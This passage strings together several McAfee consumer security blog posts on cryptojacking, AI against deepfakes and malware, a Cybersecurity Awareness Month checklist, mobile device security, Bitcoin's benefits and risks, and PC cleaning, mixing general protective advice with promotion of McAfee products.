What can that look like in the real world? We’ve seen Android phones harnessed for cryptomining after downloading malicious apps from Google Play. Cryptojackers have created counterfeit versions of popular computer performance software and infected it with cryptojacking code. We’ve also seen cryptojackers tap into the computing power of internet of things (IoT) and smart home devices as well.

Interestingly enough, the rate of cryptojacking attacks is closely tied to the vagaries of the marketplace. As the value of cryptocurrencies rise and fall, so does cryptojacking. The crooks behind these hacks go where they get the biggest bang for their buck. So as cryptocurrencies drop in value, these crooks drop their cryptojacking attacks. They opt for other attacks that offer a higher return on the resources they invest.

Despite its cyclic nature, cryptojacking remains a stubborn problem. Yet you can do plenty to prevent it from happening to you.

Three ways you can prevent cryptojacking.

• Stick to legitimate app stores:

Unlike Google Play and Apple’s App Store, which have measures in place to review and vet apps to help ensure that they are safe and secure, third-party sites might very well not. Further, some third-party sites might intentionally host malicious apps as part of a broader scam.

Granted, hackers have found ways to work around Google and Apple’s review process, yet the chances of downloading a safe app from them are far greater than anywhere else. Further, Google and Apple are quick to remove malicious apps when discovered, making their stores that much safer.

• Use online protection software:

Comprehensive online protection software like ours can protect you in several ways. First, our AI-powered antivirus detects, blocks, and removes malware—new and old. This can protect you against the latest cryptojacking attacks. Further, it includes web protection that blocks malicious sites, such as the ones that host web-based cryptojacking attacks. In all, comprehensive online protection software offers a strong line of defense.

• Protect yourself from phishing and smishing attacks:

Whether cryptojackers try to reach you by email (phishing) or text (smishing), our new McAfee Scam Protection can stop those attacks dead in their tracks. Using the power of AI, McAfee Scam Protection can alert you when scam texts pop up on your device or phone. No more guessing if a text is real or not. Further, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.

Keep cryptojackers from making a fast buck off you.

While hackers love pilfering the computing resources of large organizations, their cryptojacking attacks still target everyday folks. Just as is the case with ransomware, hackers will seek to make their money in volume. Targeting under-protected households can still reap plenty of cryptocurrency when hackers do so in numbers.

Protecting yourself is relatively easy. Several of the same general steps you take to protect yourself online offer protection from cryptojacking attacks as well. Stick to legitimate app stores, use the tools that can quash spammy emails and texts, and go online confidently with online protection software. Nobody should make a fast buck off you. Particularly a cryptojacker.

The post Cryptojacking – Stop Hackers from Making Money Off You appeared first on McAfee Blog.

As AI deepfakes and malware understandably grab the headlines, one thing gets easily overlooked—AI also works on your side. It protects you from fraud and malware as well.  

For some time now, we’ve kept our eye on AI here at McAfee. Particularly as scammers cook up fresh gluts of AI-driven hustles. And there are plenty of them.  

We’ve uncovered how scammers need only a few seconds of a voice recording to clone it using AI—which has led to all manner of imposter scams. We also showed how scammers can use AI writing tools to power their chats in romance scams, to the extent of writing love poems with AI. Recently, we shared word of fake news sites packed with bogus articles generated almost entirely with AI. AI-generated videos even played a role in a scam for “Barbie” movie tickets. 

Law enforcement, government agencies, and other regulatory bodies have taken note. In April, the U.S. Federal Trade Commission (FTC) warned consumers that AI now “turbocharges” fraud online. The commission cited a proliferation of AI tools can generate convincing text, images, audio, and videos.  

While not typically malicious in and of themselves, scammers twist these technologies to bilk victims out of their money and personal information. Likewise, just as legitimate application developers use AI to create code, hackers use AI to create malware. 

There’s no question that all these AI-driven scams mark a major change in the way we stay safe online. Yet you have a powerful ally on your side. It’s AI, as well. And it’s out there, spotting scams and malware. In fact, you’ll find it in our online protection software. We’ve put AI to work on your behalf for some time now. 

With a closer look at how AI works on your side, along with several steps that can help you spot AI fakery, you can stay safer out there. Despite the best efforts of scammers, hackers, and their AI tools. 

AI in the battle against AI-driven fraud and malware. 

One way to think about online protection is this: it’s a battle to keep you safe. Hackers employ new forms of attack that try to work around existing protections. Meanwhile, security professionals create technological advances that counter these attacks and proactively prevent them—which hackers try to work around once again. And on it goes. As technology evolves, so does this battle. And the advent of AI marks a decidedly new era in the struggle. 

As a result, security professionals also employ AI to protect people from AI-driven attacks.  

Companies now check facial scans for skin texture and translucency to determine if someone is using a mask to trick facial recognition ID. Banks employ other tools to detect suspicious mouse movements and transaction details that might be suspicious. Additionally, developers scan their code with AI tools to detect vulnerabilities that might lurk deep in their apps—in places that would take human teams hundreds, if not thousands of staff hours to detect. If at all. Code can get quite complex. 

For us, we’ve used AI in our online protection for years now. McAfee has used AI for evaluating events, files, and website characteristics. We have further used AI for detection, which has proven highly effective against entirely new forms of attack.  

We’ve also used these technologies to catalog sites for identifying sites that host malicious files or phishing operations. Moreover, cataloging has helped us shape out parental control features such that we can block content based on customer preferences with high accuracy.  

And we continue to evolve it so that it detects threats even faster and yet more accurately than before. Taken together, AI-driven protection like ours quashes threats in three ways:  

1.  It detects suspicious events and behaviors. AI provides a particularly powerful tool against entirely new threats (also known as zero-day threats). By analyzing the behavior of files for patterns that are consistent with malware behavior, it can prevent a previously unknown file or process from doing harm.  
   
2.  It further detects threats by referencing known malware signatures and behaviors. This combats zero-day and pre-existing threats alike. AI can spot zero-day threats by comparing them to malware fingerprints and behaviors it has learned. Similarly, its previous learnings help AI quickly spot pre-existing threats in this manner as well.   
3.  It automatically classifies threats and adds them to the body of threat intelligence. AI-driven threat protection gets stronger over time. The more threats it encounters, the more rapidly and readily it can determine if files are malicious or benign. Furthermore, AI automatically classifies threats at a speed and scale unmatched by traditional processes. The body of threat intelligence improves immensely as a result.  

What does AI-driven protection look like for you? It can identify malicious websites before you can connect to them. It can prevent new forms of ransomware from encrypting your photos and files. And it can keep spyware from stealing your personal information by spotting apps that would connect them to a bad actor’s command-and-control server.  

As a result, you get faster and more comprehensive protection with AI that works in conjunction with online protection software—and our security professionals develop them both.   

Protect yourself from AI voice clone attacks. 

Yet, as it is with any kind of scam, it can take more than technology to spot an AI-driven scam. It calls for eyeballing the content you come across critically. You can spot an AI-driven scam with your eyes, along with your ears and even your gut. 

Take AI voice clone attacks, for example. You can protect yourself from them by taking the following steps: 

1. Set a verbal codeword with kids, family members, or trusted close friends. Make sure it’s one only you and those closest to you know. (Banks and alarm companies often set up accounts with a codeword in the same way to ensure that you’re really you when you speak with them.) Ensure everyone knows and uses it in messages when they ask for help. 
2. Always question the source. In addition to voice cloning tools, scammers have other tools that can spoof phone numbers so that they look legitimate. Even if it’s a voicemail or text from a number you recognize, stop, pause, and think. Does that really sound like the person you think it is? Hang up and call the person directly or try to verify the information before responding.  
3. Think before you click and share. Who is in your social media network? How well do you really know and trust them? The wider your connections, the more risk you might be opening yourself up to when sharing content about yourself. Be thoughtful about the friends and connections you have online and set your profiles to “friends and families” only so that they aren’t available to the greater public. 
4. Protect your identity. Identity monitoring services can notify you if your personal information makes its way to the dark web and provide guidance for protective measures. This can help shut down other ways that a scammer can attempt to pose as you. 
5. Clear your name from data broker sites. How’d that scammer get your phone number anyway? Chances are, they pulled that information off a data broker site. Data brokers buy, collect, and sell detailed personal information, which they compile from several public and private sources, such as local, state, and federal records, in addition to third parties. Our Personal Data Cleanup scans some of the riskiest data broker sites and shows you which ones are selling your personal info. 

Three ways to spot AI-generated fakes.   

As AI continues its evolution, it gets trickier and trickier to spot it in images, video, and audio. Advances in AI give images a clarity and crispness that they didn’t have before, deepfake videos play more smoothly, and voice cloning gets uncannily accurate.   

Yet even with the best AI, scammers often leave their fingerprints all over the fake news content they create. Look for the following:  

1) Consider the context   

AI fakes usually don’t appear by themselves. There’s often text or a larger article around them. Inspect the text for typos, poor grammar, and overall poor composition. Look to see if the text even makes sense. And like legitimate news articles, does it include identifying information — like date, time, and place of publication, along with the author’s name.   

2) Evaluate the claim  

Does the image seem too bizarre to be real? Too good to be true? Today, “Don’t believe everything you read on the internet,” now includes “Don’t believe everything you see on the internet.” If a fake news story is claiming to be real, search for the headline elsewhere. If it’s truly noteworthy, other known and reputable sites will report on the event—and have done their own fact-checking.  

3) Check for distortions  

The bulk of AI technology still renders fingers and hands poorly. It often creates eyes that might have a soulless or dead look to them — or that show irregularities between them. Also, shadows might appear in places where they look unnatural. Further, the skin tone might look uneven. In deepfaked videos, the voice and facial expressions might not exactly line up, making the subject look robotic and stiff.   

AI is on your side in this new era of online protection. 

The battle between hackers and the people behind online protection continues. And while the introduction of AI has unleashed all manner of new attacks, the pattern prevails. Hackers and security professionals tap into the same technologies and continually up the game against each other. 

Understandably, AI conjures questions, uncertainty, and, arguably, fear. Yet you can rest assured that, behind the headlines of AI threats, security professionals use AI technology for protection. For good. 

Yet an online scam remains an online scam. Many times, it takes common sense and a sharp eye to spot a hustle when you see one. If anything, that remains one instance where humans still have a leg up on AI. Humans have gut instincts. They can sense when something looks, feels, or sounds …off. Rely on that instinct. And give yourself time to let it speak to you. In a time of AI-driven fakery, it still stands as an excellent first line of defense. 

The post Artificial Intelligence and Winning the Battle Against Deepfakes and Malware appeared first on McAfee Blog.

Maybe you do armloads of shopping on it. Maybe you skip going to the bank because you can tackle the bulk of your finances online. And perhaps you even pay your doctor a visit with it, instead of taking a trip to their office.  

The way we use the internet has changed. We rely on it for a wealth of important things. Now more than ever, which makes Cybersecurity Awareness Month more important than ever.  

Every October, we proudly take part in Cybersecurity Awareness Month. In partnership with the U.S. Cybersecurity and Infrastructure Agency (CISA) and a host of organizations in the private sector, we shed light on an essential topic—a safer internet. 

The time of the internet as a novelty has long passed. The internet isn’t just nice. It’s essential. To the point that it’s a utility, like power or water. With that, a safe internet is a must. 

Granted, amid news of data breaches and major hacks, it might seem like the notion of a safer internet is out of your hands. After all, what can you do to make the internet a safer place? 

Plenty. 

Extra awareness and a few straightforward actions can make your time online far safer than before. And that’s a common theme here on our blog. Even as new threats appear daily, you live in a time where you have some of the most comprehensive and easy-to-use tools to combat them—and keep yourself safe.  

With that, Cybersecurity Awareness Month comes with a quick five-step checklist you can run through. Set aside some time this month to knock out each item. You’ll find yourself much more secure from hacks, attacks, and identity theft in the wake of data breaches. 

Let’s dive in. 

1. Use strong passwords and a password manager to stay on top of them all. 

Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task. Thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software like ours will include a password manager. 

2. Set your apps and operating system to update automatically. 

Updates do all kinds of great things for gaming, streaming, and chatting apps—like adding more features and functionality over time. Updates do something else. They make those apps more secure. Hackers will hammer away at apps to find or create vulnerabilities, which can steal personal info or compromise the device itself. Updates will often include security improvements, in addition to performance improvements.  

For your computers and laptops: 

• On Windows devices, you can set up your operating system to update automatically with a trip to your Start menu. You can also set up Windows to automatically update your apps through the Microsoft Store. 
• For macOS devices, you can set up your operating system and your apps to update automatically as well from the Apple menu.  

For your smartphones: 

• Much the same goes for the operating system on smartphones too. Updates can bring more features and more security. iOS users can learn how to update their phones automatically in this article. Likewise, Android users can check out this article about automatic updates for their phones. 

For your smartphone apps: 

• iPhones typically update apps automatically by default, yet you can learn how to turn them back on here if you’ve set them to manual updates. For Android phones, this article can help you set apps to auto-update if you don’t have them set up that way already. 

3. Know how you can spot a phishing attack. 

Whether they come by way of an email, text, direct message, or as bogus ads on social media and in search, phishing attacks remain popular with cybercriminals. Across their various forms, the intent remains the same—to steal personal or account info by posing as a well-known company, organization, or even someone the victim knows. And depending on the info that gets stolen, it can result in a drained bank account, a hijacked social media profile, or any number of different identity crimes.  

What makes some phishing attacks so effective is how some hackers can make the phishing emails and sites they use look like the real thing, so learning how to spot phishing attacks has become a valuable skill nowadays. Additionally, using the power of AI, McAfee Scam Protection can alert you when scam texts pop up on your device or phone. No more guessing if a text is real or not. Further, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more.

Some signs of a phishing attack include: 

• Email addresses that slightly alter the address of a trusted brand name so it looks close. 
• Awkward introductions like a “Dear Sir or Madam,” from your bank. 
• Bad spelling and grammar, which indicates the communication is not coming from a professional organization. 
• Poor visual design, like stretched logos, mismatched colors, and cheap stock photos. 
• Urgent calls to action or threats that pressure you to claim a reward or pay a fine immediately followed by a link to do so. 
• Unexpected attachments, such as a “shipping invoice” or “bills,” which hackers use to hide payloads of malware and ransomware. 

Again, this can take a sharp eye to spot. When you get emails like these, take a moment to scrutinize them and certainly don’t click on any links. 

Another way you can fight back against crooks who phish is to report them. Check out ReportFraud.ftc.gov, which shares reports of phishing and other fraud with law enforcement. Taken with other reports, your info can aid an investigation and help bring charges on a cybercriminal or an organized ring.  

4. Multifactor your defense.  

Chances are you’re using multi-factor authentication (MFA) on a few of your accounts already, like with your bank or financial institutions. MFA provides an additional layer of protection that makes it much more difficult for a hacker or bad actor to compromise your accounts even if they know your password and username. It’s common nowadays, where an online account will ask you to use an email or a text to your smartphone to as part of your logon process. If you have MFA as an option when logging into your accounts, strongly consider using it. 

5. Clean up your personal data online.  

How did that scammer get your email address or phone number in the first place? Good chance they bought it off a data broker. 

Data brokerages make up a multi-billion-dollar business worldwide. They gather and sort data linked with millions of people globally—and then sell it. To anyone. That could be advertisers, private investigators, and potential employers. That list includes hackers and scammers as well. With your data, they can skim for your contact info so they can hit you with spammy emails, calls, and texts. Worse yet, they can use that info to help them commit identity theft. 

Good thing you can get your info removed from those sites. And a service like our Personal Data Cleanup can do the heavy lifting for you. It scans some of the riskiest data broker sites and shows you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites. With select products, we can even manage the removal for you. ​ 

It’s true, you can make the internet a safer place. 

How much time do you spend on the internet each day? Between work, home, and the phone you carry around, it’s around 6.5 hours a day on average. You spend plenty of time on the internet. And important time too as you shop, bank, and tend to your health online. 

Taking a few moments this month to shore up your security will make that time safer. Despite what you might have thought, you’re more in control of that than you think.

The post How much do you count on the internet every day? appeared first on McAfee Blog.

In the ever-growing digital age, our mobile devices contain an alarming amount of personal, sensitive data. From emails, social media accounts, banking applications to payment apps, our personal and financial lives are increasingly entwined with the convenience of online, mobile platforms. However, despite the increasing threat to cyber security, it appears many of us are complacent about protecting our mobile devices.

Survey revealed that many mobile users still use easy-to-remember and easy-to-guess passwords. With such an increasing dependence on mobile devices to handle our daily tasks, it seems unimaginable that many of us leave our important personal data unguarded. Theft or loss of an unsecured mobile device can, and often does, result in a catastrophic loss of privacy and financial security.

Mobile Device Security

The unfortunate reality of our digital era is that devices are lost, misplaced, or stolen every day. A mobile device without password protection is a gold mine for anyone with malicious intent. According to a global survey by McAfee and One Poll, many consumers are largely unconcerned about the security of their personal data stored on mobile devices. To illustrate, only one in five respondents had backed up data on their tablet or smartphone. Even more concerning, 15% admitted they saved password information on their phone.

Such statistics are troubling for several reasons. The most obvious is the risk of personal information —including banking details and online login credentials— falling into the wrong hands. A lost or stolen device is not just a device lost— it’s potentially an identity, a bank account, or worse. The lack of urgency in securing data on mobile devices speaks to a broad consumer misunderstanding about the severity of the threats posed by cybercriminals and the ease with which they can exploit an unprotected device.

→ Dig Deeper: McAfee 2023 Consumer Mobile Threat Report

The Gender Disparity in Mobile Device Security

Perhaps one of the most surprising findings of the survey is the difference in mobile security behaviors between men and women. This difference illustrates not just a disparity in the type of personal information each group holds dear, but also the degree of risk each is willing to accept with their mobile devices.

Broadly speaking, men tend to place greater value on the content stored on their devices, such as photos, videos, and contact lists. Women, on the other hand, appear more concerned about the potential loss of access to social media accounts and personal communication tools like email. They are statistically more likely to experience online harassment and privacy breaches. This could explain why they are more concerned about the security of their social media accounts, as maintaining control over their online presence can be a way to protect against harassment and maintain a sense of safety.

The loss of a mobile device, which for many individuals has become an extension of their social identity, can disrupt daily life significantly. This distinction illustrates that the consequences of lost or stolen mobile devices are not just financial, but social and emotional as well.

Risky Behaviors Persist

Despite the differences in what we value on our mobile devices, the survey showed a worrying level of risky behavior from both genders. Over half (55%) of respondents admitted sharing their passwords or PIN with others, including their children. This behavior not only leaves devices and data at risk of unauthorized access but also contributes to a wider culture of complacency around mobile security.

Password protection offers a fundamental layer of security for devices, yet many people still choose convenience over safety. Setting a password or PIN isn’t a failsafe method for keeping your data safe. However, it is a simple and effective starting point in the broader effort to protect our digital lives.

→ Dig Deeper: Put a PIN on It: Securing Your Mobile Devices

Steps to Mobile Device Security

While the survey results raise an alarm, the good news is that we can turn things around. It all begins with acknowledging the risks of leaving our mobile devices unprotected. There are simple steps that can be taken to ramp up the security of your devices and protect your personal information.

First and foremost, password-protect all your devices. This means going beyond your mobile phone to include tablets and any other portable, internet-capable devices you may use. And, while setting a password, avoid easy ones like “1234” or “1111”. These are the first combinations a hacker will try. The more complex your password is, the sturdier a barrier it forms against unauthorized access.

Another important step is to avoid using the “remember me” function on your apps or mobile web browser. Although it might seem convenient to stay logged into your accounts for quick access, this considerably amplifies the risk if your device gets stolen or lost. It’s crucial to ensure you log out of your accounts whenever not in use. This includes email, social media, banking, payment apps, and any other accounts linked to sensitive information.

McAfee Pro Tip: If your phone is lost or stolen, employing a combination of tracking your device, locking it remotely, and erasing its data can safeguard both your phone and the information it contains. Learn more tips on how to protect your mobile device from loss and theft.

Sharing your PIN or password is also a risky behavior that should be discouraged. Admittedly, this might be challenging to implement, especially with family members or close friends. But the potential harm it can prevent in the long run far outweighs the temporary convenience it might present.

Investing in Mobile Security Products

Having highlighted the importance of individual action towards secure mobile practices, it’s worth noting that investing in reliable security software can also make a world of difference. A mobile security product like McAfee Mobile Security, which offers anti-malware, web protection, and app protection, can provide a crucial extra layer of defense.

With app protection, not only are you alerted if your apps are accessing information on your mobile that they shouldn’t, but in the event that someone does unlock your device, your personal information remains safe by locking some or all of your apps. This means that even if your device falls into the wrong hands, they still won’t be able to access your crucial information.

It’s also critical to stay educated on the latest ways to protect your mobile device. Cyber threats evolve constantly, and awareness is your first line of defense. McAfee has designed a comprehensive approach to make the process of learning about mobile security not just informative but also engaging. Our array of resources includes a rich repository of blogs, insightful reports, and informative guides. These materials are meticulously crafted to provide users with a wealth of knowledge on how to protect their mobile devices, ensuring that the learning experience is not only informative but also engaging and enjoyable.

Final Thoughts

While the current state of mobile device security may seem concerning, it’s far from hopeless. By incorporating simple security practices such as setting complex passwords and avoiding shared access, we can significantly reduce the risk of unauthorized data access. Additionally, investing in trusted mobile security products like McAfee Mobile Security can provide a robust defense against advancing cyber threats. Remember, our digital lives mirror our real lives – just as we lock and secure our homes, so too must we protect our mobile devices.

The post Unprotected Mobile Devices appeared first on McAfee Blog.

In the last decade, Bitcoin has emerged as a revolutionary form of digital asset, disrupting traditional financial markets along the way. Unlike traditional currencies issued by national governments (fiat money), Bitcoin is a decentralized form of money operated via a peer-to-peer network. This means it is not regulated or controlled by any central authority or government. This, along with many other characteristics, offers a range of benefits but also poses certain risks. In this article, we will examine these advantages and challenges to help you evaluate whether the benefits of Bitcoin outweigh the risks.

Overview of Bitcoin

Bitcoin was created in 2009 by an anonymous person or group of people using the pseudonym Satoshi Nakamoto. As the first cryptocurrency, Bitcoin introduced a new kind of money that is issued and managed without the need for a central authority. Not only is Bitcoin a single unit of currency (simply referred to as a “bitcoin”), but it is also the decentralized, peer-to-peer network that enables the movement of that currency.

Bitcoin transactions are verified by network nodes through cryptography and recorded on a public ledger called blockchain. A user can access his or her bitcoins from anywhere in the world, as long as they have the private key to their unique Bitcoin address. Now, let’s delve into the inherent benefits and risks associated with Bitcoin.

The Benefits of Bitcoin

This digital cryptocurrency has gained immense popularity and continues to capture the imagination of investors, tech enthusiasts, and financial experts alike. As we dive into the world of Bitcoin, let’s also uncover the myriad benefits it brings to the table, from decentralization and security to financial inclusion and innovation.

Decentralization

As a decentralized form of currency, Bitcoin is not subject to control by any government, bank, or financial institution. This ensures that the value of Bitcoin is not affected by monetary policies or economic conditions of any specific country. It also means there is no need for intermediaries, such as banks, to process transactions. As a result, Bitcoin transactions can be faster and cheaper than traditional money transfers, particularly for international transactions.

Furthermore, this decentralization offers potential benefits in regions where the local currency is unstable or access to banking is limited. For those without bank accounts, Bitcoin provides an alternative way to store and transact money. It also provides a safeguard against the risks of government-controlled fiat currency, such as inflation or deflation. This property of Bitcoin has been particularly attractive in countries experiencing hyperinflation, such as Venezuela.

Transparency and Anonymity

Bitcoin transactions are recorded on a public ledger, the blockchain, which is accessible to anyone. This ensures a high level of transparency, as the flow of Bitcoins and the transactions can be tracked by anyone. Nonetheless, while transactions are public, the identities of the parties involved are pseudonymous. This offers a level of privacy and anonymity to users, as their real-world identities are not directly connected to their Bitcoin addresses, offering more privacy than traditional banking systems.

Moreover, because of its immutable and transparent nature, Bitcoin has potential uses beyond being a currency. The underlying blockchain technology has numerous potential applications, including secure sharing of medical records, supply chain management, and secure transfer of assets like land deeds and other legal documents.

→Dig Deeper: Demystifying Blockchain: Sifting Through Benefits, Examples and Choices

The Risks of Bitcoin

Bitcoin stands as both an enigma and a harbinger of change. Its meteoric rise to prominence has captivated the world, yet it has also garnered its fair share of scrutiny and caution. Now, let’s examine the flip side of the digital coin – the risks that come with it.

Price Volatility

One of the most well-known risks of Bitcoin is its price volatility. The value of a bitcoin can increase or decrease dramatically over a very short period. This volatility can result in significant financial loss. While some traders may enjoy this volatility because it provides exciting opportunities for high-return investments, it can be a risky venture for those seeking stability, particularly for those who intend to use Bitcoin as a regular currency.

The volatility also makes Bitcoin less feasible as a store of value. With traditional currencies, individuals can expect the purchasing power of their money to remain relatively stable over short periods of time. With Bitcoin, however, the purchasing power can fluctuate wildly from day to day.

Security Issues

While the Bitcoin network itself has remained secure since its inception, the ecosystem around it is not entirely secure. Bitcoin wallets and exchanges, which are necessary for users to store and trade Bitcoins, have been the targets of hacking in the past. In some instances, users have lost their entire Bitcoin holdings.

Bitcoin transactions are irreversible. Once a transaction is initiated, it cannot be reversed. If the transaction is fraudulent or a mistake has been made, it cannot be corrected. This risk factor demands a high level of care and caution by Bitcoin users. The anonymity of Bitcoin can also facilitate criminal activities such as money laundering and the buying and selling illegal goods, which can impact users indirectly.

→Dig Deeper: Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency

Regulatory Risks

Bitcoin operates in a relatively gray area of law and regulation. While it is not illegal, its status varies widely around the world. Some countries have embraced Bitcoin as a legitimate payment method, while others have banned or restricted it. The variability of regulation creates uncertainty and poses a risk for Bitcoin users. There’s also a risk that future regulation could adversely affect Bitcoin. For instance, if a major government declared Bitcoin use illegal, or one of the world’s largest exchanges was hacked, the value of Bitcoin could plummet.

Due to Bitcoin’s decentralized nature, lawmakers and regulatory bodies may find it difficult to draft and implement effective regulations that do not stifle innovation. The digital nature of Bitcoin also poses challenges with legal protections that are generally applied to traditional instruments, such as the ability to challenge fraudulent transactions.

→Dig Deeper: Cryptohacking: Is Cryptocurrency Losing Its Credibility?

Comparison of Bitcoin’s Benefits and Risks

When comparing the benefits and risks of Bitcoin, it becomes clear that this cryptocurrency presents both unique opportunities and challenges. On the positive side, its decentralized and peer-to-peer nature offers a level of independence and flexibility not found in traditional financial systems. Additionally, its underlying blockchain technology offers potential for numerous applications beyond cryptocurrency itself.

However, these benefits must be weighed against the risks they pose, including its high price volatility and security issues, and the potential consequences of an uncertain regulatory environment. These risks underline the need for caution and due diligence before investing in or transacting with Bitcoin.

As the first cryptocurrency, Bitcoin is still in its early stages and will likely continue to evolve. As its regulatory environment becomes clearer and its technology becomes more established, the risks associated with Bitcoin may decrease. However, until then, a balanced perspective on the benefits and risks of Bitcoin is essential for anyone considering participating in its network.

McAfee Pro Tip: Bitcoin’s security issues are one of the main risks you need to consider and watch out for if you wish to invest in Bitcoin. Traditional or cryptocurrency, learn how to protect your finances online.

Final Thoughts

In a remarkably short time, Bitcoin has evolved from a fringe concept to a global financial phenomenon, challenging conventional notions of currency and decentralization. While its disruptive potential, innovation, and the allure of financial autonomy are undeniable, Bitcoin’s journey is punctuated with volatility, regulatory ambiguities, and security concerns that demand cautious consideration. As it continues to capture the world’s imagination, Bitcoin stands as both a symbol of the digital age’s possibilities and a stark reminder of the complexities and challenges associated with redefining the future of finance. Its ultimate role in the global economy remains uncertain, but its impact on the way we perceive and utilize money is undeniable, solidifying its place in history as a transformative force in the world of finance.

As individuals, it is essential to safeguard your digital assets, traditional financial resources, and online financial dealings to ensure a secure and unrestricted existence in the modern world. That’s why we encourage you to improve your digital security. Check out our McAfee+ and Total Protection to boost your protection.

The post Do the Benefits of Bitcoin Outweigh the Risks? appeared first on McAfee Blog.

If you’re facing issues with your PC’s performance or just want to upkeep it, regular cleaning should be on your to-do list. Cleaning up your PC has several advantages, including speeding up your system and safeguarding your personal information from potential threats. Besides, the process frees up storage space, enabling you to install more programs or store more multimedia files. A monthly clean-up is usually recommended for optimal results. Those who have never cleaned their PC might be in for a pleasant surprise with its much-enhanced speed and improved performance. In this guide, we will explain the ins and outs of PC cleaning to help you on the right path.

Understanding PC Cleaning

Over time, as you store multiple files on your PC, they begin to take up more and more space. Specifically, your C drive might be gradually filling up due to backup files, hidden files, and temporary files. Additionally, even a new PC can benefit from a cleaning since it often comes with pre-installed programs that you might not need. So, what is PC cleaning? Essentially, it involves deleting unneeded files from your system when you want to free up storage space and enhance the overall performance of your PC.

Assessing Program Usage on Your PC

One of the first steps in PC cleaning involves removing unwanted programs. This can be done by accessing the ‘Programs and Features’ section of your control panel. As a necessary measure, go through the list and note down the programs that you don’t use. If you encounter programs you don’t recognize, perform a quick internet search to understand their function before deleting them. Depending on the program’s size, removing them may not take long. Alongside removing unneeded programs, you can also use the disk cleanup utility to remove temporary files, which is another crucial aspect of PC cleaning.

McAfee Pro Tip: You may find Potentially Unwanted Programs (PUP) while cleaning your computer. PUPs are not malware. The big thing to remember is that with PUPs, you’re saying “yes” to the download, even if you’re not fully aware of it because you didn’t read the fine print in the agreements or installation steps. However, Certain PUPs come bundled with spyware like keyloggers and dialers, as well as other software designed to collect your data, putting you at risk of identity theft. On the other hand, some may bombard your device with bothersome advertisements. Learn more about PUPs to avoid downloading them unknowingly. 

Cleaning Temporary Files

Temporary files consist of internet cookies and partially downloaded programs that were never installed on your system. Internet cookies store information such as user login credentials and images from websites visited. They primarily identify users and possibly prepare customized web pages or save necessary information. One of the advantages of these cookies is that they save you from entering your login information each time you visit a website. Moreover, web pages and online media you visit are stored in your browser’s cache, speeding up the browsing experience during your next visit.

The Importance of PC Cleaning

Your PC automatically stores files from the websites you visit on your hard drive. If not removed, these files accumulate over time and take up a significant amount of space on your PC. People often install programs on their PCs and forget to remove them after use, consuming much more space than they might think. Regular PC cleaning is an effective solution to prevent such issues.

→Dig Deeper: What Is Disk Cleanup And Does It Remove Viruses?

Can Deleting Files Make Your PC Faster?

While many believe that deleting files from their hard drive can increase the speed of their PC, the effect might not be as substantial as expected. Your temporary internet files can quicken the speed at which websites load because these files contain images and other media from the websites you visit. Thus, your PC doesn’t have to download them whenever you visit the same websites. However, it’s still a good practice to delete your temporary files occasionally to free up disk space.

Removing Startup Items

Some programs that you download start automatically when you turn your PC on. Although automatic startup processes are beneficial for some programs, having too many can slow down your PC. It’s advisable to manage which apps run automatically during startup to enhance PC performance.

Factors to Consider When Cleaning Your PC

While deleting temporary internet files doesn’t pose much risk, deleting the wrong programs or certain startup items can harm your PC. Start by removing temporary files and reducing startup items to see if there’s a performance improvement. Additionally, when deleting programs, it’s crucial to be fully aware of what you’re deleting to avoid problems later on.

Cleaning Sensitive Files

When you delete files from the recycle bin, they remain on your system as the deletion only removes the pointer, not the file itself. Using a file shredder can help you erase such data by overwriting the space with a pattern of 1’s and 0’s. Although this doesn’t necessarily improve performance, it helps ensure compliance with the law and prevents identity theft.

Why Cleaning Your PC is Essential?

When you own a computer, much like a car, regular maintenance and cleaning are essential. While it might not entirely increase your PC’s speed, it greatly improves efficiency and functionality, making all processes run smoother. This is because each time you visit a webpage, your computer stores all types of files to remember the website and load it faster next time. This cache gets flooded with files over time, slowing down your system. PC cleaning allows your PC to breathe, making it more responsive and liberating the storage space. Significantly, it helps in data management, eliminating all unnecessary data that might be misused or lead to identity theft.

→Dig Deeper: Manage your data this Data Privacy Day

Regular PC cleaning could also potentially save your device from significant damage. Unwanted programs and apps, especially those auto-starting ones, not only consume your system’s resources but also can contain malicious content impacting your PC. Regular cleaning will ensure any potential malware or problematic software is identified and removed promptly, thus adding a layer of protection.

How Does PC Cleaning Actually Work?

Let’s break down the PC cleaning process to simplify and understand it better. The process commences with uninstalling any unused apps and software. The next step involves clearing out temporary files, such as cache and cookies that accumulate over time and eat up storage space. Some PC cleaning programs also offer registry cleaning, which involves cleaning up the database that holds all the configuration settings for your PC. However, this is not always recommended.

→Dig Deeper: To Disable or Enable Cookies

Startup programs are another key area to look into. Having too many programs that start up when your computer boots can substantially slow down your system. Through PC cleaning, you can manage these programs and ensure only the necessary ones are allowed to auto-start. This will provide a noticeable improvement in your PC’s boot time and overall performance. Lastly, most PC cleaners come equipped with a file shredder that securely deletes sensitive files and ensures they can’t be recovered later. This helps in safeguarding your personal data and optimizing your PC’s performance.

A Cleaning Schedule and Careful Cleaning

Having a cleaning schedule for your PC enhances its performance over a longer time. A weekly check to scan and remove any threats or malware, monthly cleanup of temporary files, and a deep clean every six months can keep your PC in optimal condition. However, while deleting temporary files and unused applications is generally safe, it’s important to be careful when choosing files or applications to delete since deleting system files or vital applications can cause serious, potentially irreversible, damage to your PC.

It’s advisable to stick to cleaning procedures and tools you understand. Research and be sure of your actions before you delete anything you’re unsure about. Admittedly, this can be a time-consuming and tedious process. Thankfully, dedicated PC cleaning tools can simplify the task, autotomize the process, and eliminate the risk of unwittingly causing damage.

The Role of PC Cleaning Software

PC cleaning software, like McAfee’s Total Protection, simplifies the process of cleaning your PC. These programs are designed to detect and clear out unnecessary files, manage startup apps, and even clean the registry, often at the press of a button. It’s crucial, though, to choose a reliable and safe PC cleaning software as some can be excessive, doing more harm than good, or even carry malware. Reading reviews and understanding what each feature does is important before using PC cleaning software.

These cleaners usually come with customizable settings to suit your preferences. You can set automatic clean-ups at regular intervals, thus saving time and freeing you from the hassle of remembering to run the cleanup. A good PC cleaner should ideally also come with a file shredder to safely delete sensitive or personal files without leaving a trace.

Final Thoughts

